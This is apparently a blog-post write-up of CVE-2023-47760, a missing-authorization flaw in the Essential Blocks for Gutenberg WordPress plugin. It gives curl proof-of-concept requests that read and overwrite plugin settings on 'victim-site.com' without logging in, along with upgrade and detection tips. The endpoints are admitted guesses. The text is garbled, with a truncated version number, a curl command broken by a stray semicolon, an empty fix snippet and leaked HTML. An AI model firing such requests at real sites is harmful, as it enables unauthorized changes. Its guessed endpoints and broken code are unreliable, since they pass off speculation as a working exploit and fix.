CVE-2023-47760 - Exploiting Missing Authorization in Essential Blocks for Gutenberg (WordPress Plugin)

A critical vulnerability—CVE-2023-47760—was discovered in the popular WordPress plugin Essential Blocks for Gutenberg. This plugin is used by thousands to add custom blocks to the WordPress block editor, but versions through 4.2. suffer from a serious security weakness: Missing Authorization on certain REST API endpoints.

In this guide, we'll break down how this vulnerability works, provide proof-of-concept code, and point you to official references. If you're running this plugin, pay close attention—your WordPress site could be at risk of unauthorized data access or unauthorized actions!

References:

- WPScan Advisory
- NVD Entry
- Official plugin page

The Vulnerability in Plain English

When a user or a system interacts with your WordPress website through plugins, plugins often provide REST API endpoints. These endpoints let people (or bots) automate actions, like managing content, settings, or even user data.

Essential Blocks for Gutenberg, up to version 4.2., forgot an important step:
Some of its internal REST API endpoints don’t check if the person calling them is allowed to do so. This is missing authorization.

Imagine you left your house with the door closed, but not locked. That’s what’s happening here: only people who know about the door can walk right in.

Impact

An attacker doesn’t need to log in to your WordPress site to execute calls to these endpoints. By directly calling the right REST API endpoint, they could:

Bypass normal WordPress access controls

Depending on the site setup and which endpoints are exposed, this could mean anything from changing how blocks work, up to taking control of the plugin and potentially the site.

Proof-of-Concept (PoC): Exploiting the Vulnerability

Here’s a simplified example using curl (a command-line HTTP client) to demonstrate the vulnerability. This is based on typical vulnerable endpoints for plugins with this issue. (The actual endpoint name may differ; check the plugin’s code or advisory for the latest.)

Most REST API endpoints in WordPress look like this

/wp-json/<namespace>/<route>

Essential Blocks uses endpoints such as

/wp-json/essential-blocks/v1/get-settings
/wp-json/essential-blocks/v1/update-settings

Suppose an attacker wants to read the current plugin settings

curl -s -X GET "https://victim-site.com/wp-json/essential-blocks/v1/get-settings";

If the endpoint is vulnerable, this responds with sensitive settings—even though you aren’t logged in.

3. Writing Data as an Unauthenticated User

Worse, some endpoints may allow changes. Here’s an example if an attacker tries to update plugin options:

curl -s -X POST "https://victim-site.com/wp-json/essential-blocks/v1/update-settings"; \
  -H "Content-Type: application/json" \
  -d '{
      "setting_name": "custom_css",
      "value": "body {background: black !important;}"
  }'

If this succeeds, an attacker just altered how blocks appear site-wide!

How Do You Fix This?

Upgrade Immediately
Essential Blocks for Gutenberg fixed the issue in later versions.

Go to your WP Admin → Plugins → Essential Blocks → Update to the latest version.

General Advice for Plugin Authors:

register_rest_route(

'essential-blocks/v1',
'/get-settings',

]

);
<br><br>---<br><br>## Detection Tips<br><br>- <b>Look for unusual REST API traffic</b> hitting endpoints like /wp-json/essential-blocks/v1/...`
- Monitor for unexplained changes in plugin settings or block appearances
- Use a WordPress security plugin (iThemes Security, Wordfence, etc.) that scans for vulnerable plugin versions

---

## Original References

- WPScan CVE-2023-47760 Advisory
- National Vulnerability Database - CVE-2023-47760
- WordPress Plugin: Essential Blocks for Gutenberg

---

## Conclusion

CVE-2023-47760 is a high-risk, easy-to-exploit bug in Essential Blocks for Gutenberg—one of WordPress's favorite block plugins.
If you’re using this plugin (version 4.2. or below), you must upgrade immediately.

Stay vigilant:
- Update plugins regularly
- Review plugin and site security best practices
- Check your site logs for suspicious API traffic

Your site’s security is only as strong as its weakest plugin.

---

*If you found this guide helpful, please share with a friend who uses WordPress. Stay safe on the web!*

Timeline

Published on: 12/09/2024 13:15:29 UTC